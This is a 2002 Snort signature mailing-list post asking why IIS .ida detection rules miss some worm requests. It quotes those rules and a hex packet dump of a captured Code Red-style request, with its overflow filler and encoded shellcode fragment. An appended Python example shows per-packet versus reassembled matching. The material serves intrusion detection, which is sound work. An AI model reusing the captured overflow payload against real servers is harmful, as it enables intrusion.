[Snort-sigs] Signatures for .ida attempt

robert rroot at ...254...
Wed Jan 16 13:23:04 EST 2002


On Tue, 15 Jan 2002 16:58:00 -0500, you wrote:

>I've been using a windows build of snort for about a month now.
>I have caught a few .ida attempts which have slipped past the 
>rule sets for some reason. <all within the past week>
>
>Going over the web-iis.rules which contain the .ida attempt rules,
>I cannot figure out where / why the rules are not catching the 
>attempt to install the worm.
>
>Would this be the correct forum to cut & paste the packets, for 
>discussion on creating <or modifying> a rule to catch these?
>
>Robert

Ok, here goes.

For ease of reading, turn your word wrap feature off.

The rules from web-iis.rules I am looking at are:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ISAPI .ida attempt"; uricontent:".ida?"; nocase; dsize:>239; flags:A+; reference:arachnids,552; classtype:web-application-attack; reference:cve,CAN-2000-0071; sid:1243; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ISAPI .ida access"; uricontent:".ida"; nocase; flags:A+; reference:arachnids,552; classtype:web-application-activity; reference:cve,CAN-2000-0071; sid:1242; rev:2;)

Looking at this logically, I still cannot figure this out.
<not the rules, I understand them, but why this is happening>
1.  For the rules, the ".ida" trigger is part of the "URI" content.
2.  I am receiving these in a series of 3 or more packets.
3.  The first packet is an HTTP GET of only a few bytes, which varies
4.  The second packet contains the ".ida" content
5.  In my system this <the .ida> is being reported as part of the "Request Method", not the URI
6.  Although the ".ida" is reported as part of the "request method",
    the rules catch these packets some of the time.
    Could this be particular to my OS? <win 2k>
    I am using winsock 2, sockets version 2.2.

I have studied the packets which triggered a rules alert 
and the packets which did not.
For the life of me, I cannot figure out any reason why
some ".ida" packets are getting caught or slipping through.
At first I thought it was because my system is reporting the ".ida?" as part of the 
"Request Method" and not as part of the URI, but that was not it.
My system is showing all of the packets which contain ".ida?", as being part of the 
"Request Method".  Not just the ones which slipped through.

I mentioned I am receiving the ".ida?" data within the second packet of the 
original http GET request.  Could this be part of the cause?
Does anyone know if usually the ".ida?" is contained within the first http GET?
My first http get contains only this:

  HTTP: GET Request (from client using port 3965)
      HTTP: Request Method = GET
      HTTP: Uniform Resource Identifier = 
3

00000:  00 01 02 87 97 19 00 20 78 D1 27 AF 08 00 45 00   ....... x.'...E.
00010:  00 2C 92 C4 40 00 6E 06 47 27 D8 B0 98 23 C0 A8   .,..@.n.G'...#..
00020:  01 64 0F 7D 00 50 8A E0 0F C9 7A 02 9F 90 50 18   .d.}.P....z...P.
00030:  25 30 F8 48 00 00 47 45 54 20 01 33               %0.H..GET .3    

Notice the URI content only contains a hex 01 33.  This also varies from 
attempt to attempt. 
TCP flags are Ack & Push

I realize I could change the "uricontent" to "content" in the web-iis.rules.
Or add 2 more rules to my local.rules with "content:"
Or change the "/.ida?" to something like "HOST:www.worm.com" or the hex equivalent.
This would be a jury-rig fix at best, for my particular system only.

I am snipping part of the packets that have no bearing.
Also I included notes to the right side. This shows where the 
"Request Method" and the "URI", starts and ends as reported by my OS.

Any thoughts, or slaps up beside the head?? <bg>
All are welcome.


 - -  begin tear line for packet - - - 

  IP: ID = 0x92C5; Proto = TCP; Len: 1400
      IP: Version = 4 (0x4)
      IP: Header Length = 20 (0x14)
      IP: Precedence = Routine
      IP: Type of Service = Normal Service
      IP: Total Length = 1400 (0x578)
      IP: Identification = 37573 (0x92C5)
      IP: Flags Summary = 2 (0x2)
          IP: .......0 = Last fragment in datagram
          IP: ......1. = Cannot fragment datagram
      IP: Fragment Offset = 0 (0x0) bytes
      IP: Time to Live = 110 (0x6E)
      IP: Protocol = TCP - Transmission Control
      IP: Checksum = 0x41DA
      IP: Source Address = 216.176.152.35
      IP: Destination Address = 192.168.1.100
      IP: Data: Number of data bytes remaining = 1380 (0x0564)
  TCP: .AP..., len: 1360, seq:2329939917-2329941277, ack:2046992272, win: 9520, src: 3965  dst:   80 
      TCP: Source Port = 0x0F7D
      TCP: Destination Port = Hypertext Transfer Protocol
      TCP: Sequence Number = 2329939917 (0x8AE00FCD)
      TCP: Acknowledgement Number = 2046992272 (0x7A029F90)
      TCP: Data Offset = 20 (0x14)
      TCP: Reserved = 0 (0x0000)
      TCP: Flags = 0x18 : .AP...
          TCP: ..0..... = No urgent data
          TCP: ...1.... = Acknowledgement field significant
          TCP: ....1... = Push function
          TCP: .....0.. = No Reset
          TCP: ......0. = No Synchronize
          TCP: .......0 = No Fin
      TCP: Window = 9520 (0x2530)
      TCP: Checksum = 0x12CF
      TCP: Urgent Pointer = 0 (0x0)
      TCP: Data: Number of data bytes remaining = 1360 (0x0550)
  HTTP: Request (from client using port 3965)
      HTTP: Request Method = /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      HTTP: Uniform Resource Identifier = HTTP/1.0

00000:  00 01 02 87 97 19 00 20 78 D1 27 AF 08 00 45 00   ....... x.'...E.
00010:  05 78 92 C5 40 00 6E 06 41 DA D8 B0 98 23 C0 A8   .x..@.n.A....#..
00020:  01 64 0F 7D 00 50 8A E0 0F CD 7A 02 9F 90 50 18   .d.}.P....z...P.
00030:  25 30 12 CF 00 00 2F 64 65 66 61 75 6C 74 2E 69   %0..../default.i   note: This is the start of the "Request Method" 
00040:  64 61 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   da?NNNNNNNNNNNNN   it starts with "/default.ida" and continues 
00050:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN   down to the beginning of the URI
00060:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00070:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00080:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00090:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000A0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000B0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000C0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000D0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000E0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000F0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00100:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00110:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00120:  4E 4E 4E 25 75 39 30 39 30 25 75 36 38 35 38 25   NNN%u9090%u6858%
00130:  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909
00140:  30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37   0%u6858%ucbd3%u7
00150:  38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25   801%u9090%u6858%
00160:  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909
00170:  30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30   0%u9090%u8190%u0
00180:  30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25   0c3%u0003%u8b00%
00190:  75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37   u531b%u53ff%u007
001A0:  38 25 75 30 30 30 30 25 75 30 30 3D 61 20 20 48   8%u0000%u00=a  H    note: this is the start of the "URI"
001B0:  54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74   TTP/1.0..Content    Everything starting with the "HTTP/1.0"
001C0:  2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A   -type: text/xml.    and below is listed as part of the URI  
001D0:  48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F   HOST:www.worm.co    on my system
001E0:  6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43   m. Accept: */*.C
001F0:  6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33   ontent-length: 3
00200:  35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00   569 ....U.......


 - - - end tear line for packet  - - - 
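The segment split the post describes, as an added example (not code from the post or from Snort): two client segments constructed from the dumps above are matched per packet, as a naive decoder that takes the first token as the method would see them, and then again after ordering and joining by sequence number. The decoder, the rule test and the placeholder body are this example's own simplifications, not Snort's stream4 or HTTP decoder.

```python
"""Per-packet vs. reassembled matching of the sid 1243 test from the post.
Added example; Snort's own stream and HTTP decoders are not reproduced."""
from dataclasses import dataclass


@dataclass
class Segment:
    seq: int        # TCP sequence number of the first payload byte
    payload: bytes


# Constructed from the dumps above.  The first frame's IP total length
# (0x002C) leaves 4 bytes of TCP data, so its payload is just "GET ", and
# 0x8AE00FC9 + 4 == 0x8AE00FCD, the second segment's sequence number.
# The worm body after the headers is replaced by a placeholder.
SEG1 = Segment(0x8AE00FC9, b"GET ")
SEG2 = Segment(0x8AE00FCD,
               b"/default.ida?" + b"N" * 224 + b"%u9090%u6858%u00=a  HTTP/1.0\r\n"
               b"Content-type: text/xml\nHOST:www.worm.com\n Accept: */*\n"
               b"Content-length: 3569 \r\n\r\n" + b"<body placeholder>")


def split_request_line(data: bytes) -> dict:
    """Naive decoder of the kind the post describes: the first
    whitespace-delimited token is the method, the second is the URI."""
    parts = data.split(b"\r\n", 1)[0].split()
    return {"method": parts[0] if parts else b"",
            "uri": parts[1] if len(parts) > 1 else b""}


def sid1243_matches(data: bytes) -> bool:
    """uricontent:".ida?"; nocase; dsize:>239 evaluated on one buffer."""
    uri = split_request_line(data)["uri"].lower()
    return b".ida?" in uri and len(data) > 239


def per_packet_verdicts(segments: list) -> list:
    """What the rule sees when each segment is inspected on its own."""
    return [sid1243_matches(s.payload) for s in segments]


def reassemble(segments: list) -> bytes:
    """Order the client's segments by sequence number and join them."""
    return b"".join(s.payload for s in sorted(segments, key=lambda s: s.seq))


def stream_verdict(segments: list) -> bool:
    """The same test after reassembly: the URI now starts with /default.ida?"""
    return sid1243_matches(reassemble(segments))
```

Inspected alone, the second segment's first token is the path, so the "URI" the decoder reports is HTTP/1.0 and the uricontent test cannot fire; only the joined stream puts "GET " back in front of it.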